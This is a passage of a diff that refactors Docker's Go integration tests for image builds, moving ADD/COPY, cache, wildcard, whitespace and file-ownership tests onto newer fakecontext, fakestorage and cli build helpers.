name1), false) +ONBUILD ENTRYPOINT ["echo"]`)) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1))) out, _ := dockerCmd(c, "run", name2) - if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { c.Fatal("got malformed output from onbuild", out) } @@ -498,70 +370,51 @@ ONBUILD ENTRYPOINT ["echo"]`, func (s *DockerSuite) TestBuildCacheAdd(c *check.C) { testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet name := "testbuildtwoimageswithadd" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", "index.html": "world", - }) - 
if err != nil { - c.Fatal(err) - } + })) defer server.Close() - if _, err := buildImage(name, - fmt.Sprintf(`FROM scratch - ADD %s/robots.txt /`, server.URL()), - true); err != nil { - c.Fatal(err) - } - if err != nil { - c.Fatal(err) - } - deleteImages(name) - _, out, err := buildImageWithOut(name, - fmt.Sprintf(`FROM scratch - ADD %s/index.html /`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - if strings.Contains(out, "Using cache") { + cli.BuildCmd(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch + ADD %s/robots.txt /`, server.URL()))) + + result := cli.Docker(cli.Build(name), build.WithDockerfile(fmt.Sprintf(`FROM scratch + ADD %s/index.html /`, server.URL()))) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), "Using cache") { c.Fatal("2nd build used cache on ADD, it shouldn't") } - } func (s *DockerSuite) TestBuildLastModified(c *check.C) { + // Temporary fix for #30890. TODO @jhowardmsft figure out what + // has changed in the master busybox image. + testRequires(c, DaemonIsLinux) + name := "testbuildlastmodified" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "file": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() var out, out2 string + args := []string{"run", name, "ls", "-l", "--full-time", "/file"} dFmt := `FROM busybox ADD %s/file /` - dockerfile := fmt.Sprintf(dFmt, server.URL()) - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - - out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out = cli.DockerCmd(c, args...).Combined() // Build it again and make sure the mtime of the file didn't change. 
// Wait a few seconds to make sure the time changed enough to notice time.Sleep(2 * time.Second) - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out2 = cli.DockerCmd(c, args...).Combined() if out != out2 { c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2) @@ -569,20 +422,14 @@ ADD %s/file /` // Now 'touch' the file and make sure the timestamp DID change this time // Create a new fakeStorage instead of just using Add() to help windows - server, err = fakeStorage(map[string]string{ + server = fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "file": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() dockerfile = fmt.Sprintf(dFmt, server.URL()) - - if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { - c.Fatal(err) - } - out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + out2 = cli.DockerCmd(c, args...).Combined() if out == out2 { c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2) @@ -596,28 +443,20 @@ ADD %s/file /` func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) { name := "testbuildmodifyfileinfolder" - ctx, err := fakeContext(`FROM busybox + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox RUN ["mkdir", "/test"] -ADD folder/file /test/changetarget`, - map[string]string{}) - if err != nil { - c.Fatal(err) - } +ADD folder/file /test/changetarget`)) defer ctx.Close() if err := ctx.Add("folder/file", "first"); err != nil { c.Fatal(err) } - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) if err := ctx.Add("folder/file", "second"); err != nil { 
c.Fatal(err) } - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("cache was used even though file contents in folder was changed") } @@ -625,8 +464,8 @@ ADD folder/file /test/changetarget`, func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddimg" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testaddimg", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -634,37 +473,24 @@ RUN chown dockerio.dockerio /exists ADD test_file / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_file", "test1"))) } // Issue #3960: "ADD src ." 
hangs func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) { name := "testaddsinglefiletoworkdir" - ctx, err := fakeContext(`FROM busybox -ADD test_file .`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile( + `FROM busybox + ADD test_file .`), + fakecontext.WithFiles(map[string]string{ "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() errChan := make(chan error) go func() { - _, err := buildImageFromContext(name, ctx, true) - errChan <- err + errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error close(errChan) }() select { @@ -677,8 +503,8 @@ ADD test_file .`, func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddsinglefiletoexistdir" - ctx, err := fakeContext(`FROM busybox + cli.BuildCmd(c, "testaddsinglefiletoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -687,32 +513,19 @@ RUN chown -R dockerio.dockerio /exists ADD test_file /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", 
fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - name := "testcopymultiplefilestofile" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + cli.BuildCmd(c, "testcopymultiplefilestofile", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -723,141 +536,75 @@ ADD test_file3 test_file4 %s/robots.txt /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ] - RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ] - RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -`, server.URL()), - map[string]string{ - "test_file1": "test1", - "test_file2": "test2", - "test_file3": "test3", - "test_file4": "test4", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +`, server.URL())), + build.WithFile("test_file1", "test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test_file3", "test3"), + build.WithFile("test_file3", "test3"), + build.WithFile("test_file4", "test4"))) } -// This test is mainly for user namespaces to verify that new directories +// These tests are mainly for user namespaces to verify that new directories // are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddtonewdest" - ctx, err := fakeContext(`FROM 
busybox -ADD . /new_dir -RUN ls -l / -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test file", - }) - if err != nil { - c.Fatal(err) +func (s *DockerSuite) TestBuildUsernamespaceValidateRemappedRoot(c *check.C) { + testRequires(c, DaemonIsLinux) + testCases := []string{ + "ADD . /new_dir", + "COPY test_dir /new_dir", + "WORKDIR /new_dir", } - defer ctx.Close() + name := "testbuildusernamespacevalidateremappedroot" + for _, tc := range testCases { + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox +%s +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, tc)), + build.WithFile("test_dir/test_file", "test file"))) - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) + cli.DockerCmd(c, "rmi", name) } } -// This test is mainly for user namespaces to verify that new directories -// are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopytonewdir" - ctx, err := fakeContext(`FROM busybox -COPY test_dir /new_dir -RUN ls -l /new_dir -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test file", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() +func (s *DockerSuite) TestBuildAddAndCopyFileWithWhitespace(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently passing on Windows + name := "testaddfilewithwhitespace" - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } -} - -// This test is mainly for user namespaces to verify that new directories -// are created as the remapped root uid/gid pair -func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := 
"testworkdirownership" - if _, err := buildImage(name, `FROM busybox -WORKDIR /new_dir -RUN ls -l / -RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil { - c.Fatal(err) - } -} - -func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) { - testRequires(c, DaemonIsLinux) // Not currently passing on Windows - name := "testaddfilewithwhitespace" - ctx, err := fakeContext(`FROM busybox + for _, command := range []string{"ADD", "COPY"} { + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN mkdir "/test dir" RUN mkdir "/test_dir" -ADD [ "test file1", "/test_file1" ] -ADD [ "test_file2", "/test file2" ] -ADD [ "test file3", "/test file3" ] -ADD [ "test dir/test_file4", "/test_dir/test_file4" ] -ADD [ "test_dir/test_file5", "/test dir/test_file5" ] -ADD [ "test dir/test_file6", "/test dir/test_file6" ] +%s [ "test file1", "/test_file1" ] +%s [ "test_file2", "/test file2" ] +%s [ "test file3", "/test file3" ] +%s [ "test dir/test_file4", "/test_dir/test_file4" ] +%s [ "test_dir/test_file5", "/test dir/test_file5" ] +%s [ "test dir/test_file6", "/test dir/test_file6" ] RUN [ $(cat "/test_file1") = 'test1' ] RUN [ $(cat "/test file2") = 'test2' ] RUN [ $(cat "/test file3") = 'test3' ] RUN [ $(cat "/test_dir/test_file4") = 'test4' ] RUN [ $(cat "/test dir/test_file5") = 'test5' ] -RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, - map[string]string{ - "test file1": "test1", - "test_file2": "test2", - "test file3": "test3", - "test dir/test_file4": "test4", - "test_dir/test_file5": "test5", - "test dir/test_file6": "test6", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() +RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, command, command, command, command, command, command)), + build.WithFile("test file1", "test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test file3", "test3"), + build.WithFile("test dir/test_file4", "test4"), + 
build.WithFile("test_dir/test_file5", "test5"), + build.WithFile("test dir/test_file6", "test6"), + )) - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) + cli.DockerCmd(c, "rmi", name) } } -func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) { - dockerfile := `FROM busybox -RUN mkdir "/test dir" -RUN mkdir "/test_dir" -COPY [ "test file1", "/test_file1" ] -COPY [ "test_file2", "/test file2" ] -COPY [ "test file3", "/test file3" ] -COPY [ "test dir/test_file4", "/test_dir/test_file4" ] -COPY [ "test_dir/test_file5", "/test dir/test_file5" ] -COPY [ "test dir/test_file6", "/test dir/test_file6" ] -RUN [ $(cat "/test_file1") = 'test1' ] -RUN [ $(cat "/test file2") = 'test2' ] -RUN [ $(cat "/test file3") = 'test3' ] -RUN [ $(cat "/test_dir/test_file4") = 'test4' ] -RUN [ $(cat "/test dir/test_file5") = 'test5' ] -RUN [ $(cat "/test dir/test_file6") = 'test6' ]` - - if daemonPlatform == "windows" { - dockerfile = `FROM ` + WindowsBaseImage + ` +func (s *DockerSuite) TestBuildCopyFileWithWhitespaceOnWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := `FROM ` + testEnv.PlatformDefaults.BaseImage + ` RUN mkdir "C:/test dir" RUN mkdir "C:/test_dir" COPY [ "test file1", "/test_file1" ] @@ -872,40 +619,28 @@ RUN find "test3" "C:/test file3" RUN find "test4" "C:/test_dir/test_file4" RUN find "test5" "C:/test dir/test_file5" RUN find "test6" "C:/test dir/test_file6"` - } name := "testcopyfilewithwhitespace" - ctx, err := fakeContext(dockerfile, - map[string]string{ - "test file1": "test1", - "test_file2": "test2", - "test file3": "test3", - "test dir/test_file4": "test4", - "test_dir/test_file5": "test5", - "test dir/test_file6": "test6", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("test file1", 
"test1"), + build.WithFile("test_file2", "test2"), + build.WithFile("test file3", "test3"), + build.WithFile("test dir/test_file4", "test4"), + build.WithFile("test_dir/test_file5", "test5"), + build.WithFile("test dir/test_file6", "test6"), + )) } func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { name := "testcopywildcard" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "robots.txt": "hello", "index.html": "world", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM busybox COPY file*.txt /tmp/ RUN ls /tmp/file1.txt /tmp/file2.txt RUN [ "mkdir", "/tmp1" ] @@ -914,29 +649,22 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { RUN [ "mkdir", "/tmp2" ] ADD dir/*dir %s/robots.txt /tmp2/ RUN ls /tmp2/nest_nest_file /tmp2/robots.txt - `, server.URL()), - map[string]string{ + `, server.URL())), + fakecontext.WithFiles(map[string]string{ "file1.txt": "test1", "file2.txt": "test2", "dir/nested_file": "nested file", "dir/nested_dir/nest_nest_file": "2 times nested", "dirt": "dirty", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Now make sure we use a cache the 2nd time - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatal("didn't use the cache") @@ -945,55 +673,44 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { } func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) { - name := "testcopywildcardinname" - ctx, err := fakeContext(`FROM busybox + // Run this only on Linux + 
// Below is the original comment (that I don't agree with — vdemeester) + // Normally we would do c.Fatal(err) here but given that + // the odds of this failing are so rare, it must be because + // the OS we're running the client on doesn't support * in + // filenames (like windows). So, instead of failing the test + // just let it pass. Then we don't need to explicitly + // say which OSs this works on or not. + testRequires(c, DaemonIsLinux, UnixCli) + + buildImageSuccessfully(c, "testcopywildcardinname", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox COPY *.txt /tmp/ RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ] - `, map[string]string{"*.txt": "hi there"}) - - if err != nil { - // Normally we would do c.Fatal(err) here but given that - // the odds of this failing are so rare, it must be because - // the OS we're running the client on doesn't support * in - // filenames (like windows). So, instead of failing the test - // just let it pass. Then we don't need to explicitly - // say which OSs this works on or not. - return - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("should have built: %q", err) - } + `), + build.WithFile("*.txt", "hi there"), + )) } func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { name := "testcopywildcardcache" - ctx, err := fakeContext(`FROM busybox - COPY file1.txt /tmp/`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox + COPY file1.txt /tmp/`), + fakecontext.WithFiles(map[string]string{ "file1.txt": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Now make sure we use a cache the 2nd time even with wild cards. 
// Use the same context so the file is the same and the checksum will match ctx.Add("Dockerfile", `FROM busybox COPY file*.txt /tmp/`) - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatal("didn't use the cache") @@ -1003,8 +720,8 @@ func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddsinglefiletononexistingdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testaddsinglefiletononexistingdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1012,49 +729,28 @@ RUN chown dockerio.dockerio /exists ADD test_file /test_dir/ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testadddircontenttoroot" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testadddircontenttoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists 
RUN chown dockerio.dockerio exists ADD test_dir / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testadddircontenttoexistingdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testadddircontenttoexistingdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1063,24 +759,14 @@ RUN chown -R dockerio.dockerio /exists ADD test_dir/ /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddwholedirtoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testaddwholedirtoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 
'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1090,67 +776,40 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_dir/test_file", "test1"))) } -// Testing #5941 -func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) { - name := "testaddetctoroot" - - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` -ADD . /`, - map[string]string{ - "etc/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +// Testing #5941 : Having an etc directory in context conflicts with the /etc/mtab +func (s *DockerSuite) TestBuildAddOrCopyEtcToRootShouldNotConflict(c *check.C) { + buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` +ADD . /`), + build.WithFile("etc/test_file", "test1"))) + buildImageSuccessfully(c, "testcopyetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` +COPY . 
/`), + build.WithFile("etc/test_file", "test1"))) } -// Testing #9401 +// Testing #9401 : Losing setuid flag after a ADD func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddpreservesfilesspecialbits" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox ADD suidbin /usr/bin/suidbin RUN chmod 4755 /usr/bin/suidbin RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ] ADD ./data/ / -RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`, - map[string]string{ - "suidbin": "suidbin", - "/data/usr/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`), + build.WithFile("suidbin", "suidbin"), + build.WithFile("/data/usr/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testcopysinglefiletoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1158,37 +817,23 @@ RUN chown dockerio.dockerio /exists COPY test_file / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil 
{ - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_file", "test1"))) } // Issue #3960: "ADD src ." hangs - adapted for COPY func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) { name := "testcopysinglefiletoworkdir" - ctx, err := fakeContext(`FROM busybox -COPY test_file .`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox +COPY test_file .`), + fakecontext.WithFiles(map[string]string{ "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() errChan := make(chan error) go func() { - _, err := buildImageFromContext(name, ctx, true) - errChan <- err + errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error close(errChan) }() select { @@ -1201,8 +846,8 @@ COPY test_file .`, func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletoexistdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopysinglefiletoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1211,24 +856,14 @@ RUN chown -R dockerio.dockerio /exists COPY test_file /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s 
